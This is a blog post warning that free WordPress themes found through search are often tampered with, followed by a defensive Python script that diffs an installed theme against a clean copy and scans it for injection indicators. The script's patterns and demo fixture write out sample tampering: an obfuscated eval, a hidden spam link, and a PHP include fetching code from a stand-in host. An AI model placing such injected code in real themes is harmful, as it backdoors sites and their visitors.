This pretty scary article from WordPressmu.org illustrates some of the pitfalls you may encounter while looking around for a suitable free theme for your WordPress site. According to the research in the article, nine out of the top ten Google results for the search term "Free WordPress Themes" direct you to sites allowing you to download free themes that have been tampered with and have had malicious code or malware inserted.

Here at northStudio we develop and maintain a range of WordPress sites through our wordpresspro.ca division, although the preference in-house is generally to use the more robust and flexible Drupal Content Management System for most client websites.

WordPress is an excellent blogging platform and one which I worked on for a few years before migrating to Drupal. Something that always frustrates me about developing more complex sites with WordPress is that the quality of the community plugins and themes can vary greatly. There are some hugely useful and very well written plugins and themes for WordPress, but finding them usually involves sifting through a sea of half-broken, outdated and badly written ones to find out which will work best for you (or which will work at all).

Things improved drastically when WordPress.org started offering a central place to download themes and plugins. User ratings and comments helped too in sifting out clearly broken plugins, but as the entire WordPress eco-system continued to blossom and grow, so did the shady edges of cybercriminals looking for a way to target this growth. Currently estimated to power around 10% of the internet with upwards of 6.03 million users, it's easy to see why hackers and spammers began to see the WordPress eco-system as an easy target for their exploits. Another factor contributing to this vulnerability is that WordPress primarily attracts people who are looking for a simple way to set up a site or blog. As such they are not necessarily technically savvy and don't realise the implications of not securing a site properly, of using insecure passwords, or of having incorrect file or folder permissions set, which can allow hackers easy access.

Anyone who runs a blog on WordPress today can attest to the barrage of spam most sites start to get within a few hours of being launched. Thankfully the tools for dealing with this spam have improved, but there is still administrative overhead in dealing with the hundreds of fake comments. A proliferation of "splogs", or spam blogs, also flourished alongside the growth of legitimate blogs, with WordPress.com recently deleting over 800 000 splogs from its hosted blogging service.

These sites are often scrapers that pull their content from publicly available RSS feeds (or illegally scrape sites) and in most cases only exist to create back links and references to other sites in an attempt to improve Google rankings for the targeted site. With this in mind it's clear to see why the sites offering the compromised "free themes" have such high search rankings. Every person who downloads and installs one of their hacked themes on a live server effectively ends up unintentionally linking to them, providing more reason for Google to see the sites as "popular" and "relevant".

There are a few things you can do to prevent becoming a victim of a hacked theme or plugin:

  • Only download WordPress themes and plugins from the official repository at http://wordpress.org/extend.
  • Legitimate sites offering free WordPress themes will usually not have the word "Wordpress" somewhere in the URL. WordPress is trademarked, and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes.
  • Always use secure passwords with at least one uppercase letter, one lowercase letter, a number and some punctuation.
  • Check the plugin's usage stats to see if it's a popular plugin or not, and read user reviews and comments to reduce the possibility of investing time in something that does not work.
  • Don't download and use pirated "premium themes" posted on bit-torrent sites. They are almost certainly hiding nasties. If you do, you will deserve the hack or malware that will surely follow.

Finally, I would like to suggest that you consider switching to Drupal. That's not to say that similar things couldn't happen with Drupal and externally distributed themes and modules, but I find that Drupal.org is much more effective at providing a central repository that allows developers and end users to evaluate whether modules/themes work, while also allowing direct communication with the module/theme author. This reduces the need for developers to distribute their work from their own sites.

If you have recently downloaded a handful of free themes and set them up on your server "just to see", please evaluate where they came from and if necessary re-download them from wordpress.org to make sure that you have the un-compromised versions. If testing new themes from possibly dodgy sites, remember to set them up on a local installation rather than straight onto your live server.
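The two checks suggested above, re-downloading a theme from wordpress.org and comparing it with what is installed, and looking at a theme from a dodgy source before trusting it, can both be scripted. The following is an added example written for this post, not code from the original article or from WordPress: it hashes every file in an installed theme against a pristine reference copy to report added, changed and missing files, and then runs a small set of heuristic indicators (an `eval` wrapped around a decoding function, a hidden `display:none` block containing a link, and an `include` of a remote URL) over the PHP, HTML and JS files. The indicator patterns, the `build_demo_theme_dirs` helper and all file contents it writes are constructed for the demonstration and are assumptions, not a complete or authoritative malware signature list.

```python
"""
Compare an installed WordPress theme directory against a pristine copy
re-downloaded from wordpress.org and flag common tampering indicators.
Illustrative helper for this post; the indicator patterns are assumptions.
"""
import hashlib
import os
import re
import tempfile

# Heuristic indicators typical of injected theme code (assumed, not exhaustive).
SUSPICIOUS_PATTERNS = {
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "hidden_link": re.compile(
        r"<(?:div|span)[^>]*display\s*:\s*none[^>]*>.*?<a\s", re.I | re.S),
    "remote_include": re.compile(
        r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
}


def file_hashes(root):
    """Return {relative_path: sha256 hex digest} for every file under root."""
    hashes = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                hashes[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


def diff_against_reference(installed_root, reference_root):
    """Report files added to, modified in, or missing from the installed copy."""
    installed = file_hashes(installed_root)
    reference = file_hashes(reference_root)
    return {
        "added": sorted(p for p in installed if p not in reference),
        "modified": sorted(p for p in installed
                           if p in reference and installed[p] != reference[p]),
        "missing": sorted(p for p in reference if p not in installed),
    }


def scan_for_indicators(root, extensions=(".php", ".html", ".js")):
    """Return {relative_path: [indicator names]} for files matching any pattern."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def check_theme(installed_root, reference_root):
    """Combine the hash diff and the indicator scan into one report."""
    report = diff_against_reference(installed_root, reference_root)
    report["indicators"] = scan_for_indicators(installed_root)
    return report


def build_demo_theme_dirs():
    """Construct a pristine and a tampered theme copy in a temp dir (sample data only)."""
    base = tempfile.mkdtemp(prefix="theme_check_")
    ref = os.path.join(base, "reference")
    inst = os.path.join(base, "installed")
    os.makedirs(ref)
    os.makedirs(inst)
    clean_header = "<?php wp_head(); ?>\n"
    clean_footer = "<?php wp_footer(); ?>\n</body></html>\n"
    for d in (ref, inst):
        with open(os.path.join(d, "header.php"), "w") as fh:
            fh.write(clean_header)
    with open(os.path.join(ref, "footer.php"), "w") as fh:
        fh.write(clean_footer)
    # Constructed tampering: an obfuscated eval (decodes to the word "sample")
    # and a hidden spam link prepended to an otherwise identical footer.
    tampered = ('<?php eval(base64_decode("c2FtcGxl")); ?>\n'
                '<div style="display:none"><a href="http://example.invalid/">x</a></div>\n'
                + clean_footer)
    with open(os.path.join(inst, "footer.php"), "w") as fh:
        fh.write(tampered)
    # Constructed extra file not present in the reference copy.
    with open(os.path.join(inst, "extra-helper.php"), "w") as fh:
        fh.write("<?php include('http://example.invalid/x.txt'); ?>\n")
    return inst, ref


if __name__ == "__main__":
    installed, reference = build_demo_theme_dirs()
    for key, value in check_theme(installed, reference).items():
        print(f"{key}: {value}")
```

For a real check, point `check_theme` at the theme under `wp-content/themes/` and at the freshly unzipped copy from wordpress.org. The hash diff is the reliable part: any file that differs from the pristine download deserves a look. The indicator scan is a heuristic to prioritise that look, and it can produce false positives, since some legitimate code also uses `base64_decode`, so treat a hit as a prompt to read the file rather than as proof of tampering.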

I highly recommend that you read the full article on wordpressmu.org to get a better sense of how these themes are being exploited and for more practical info on how you can avoid them.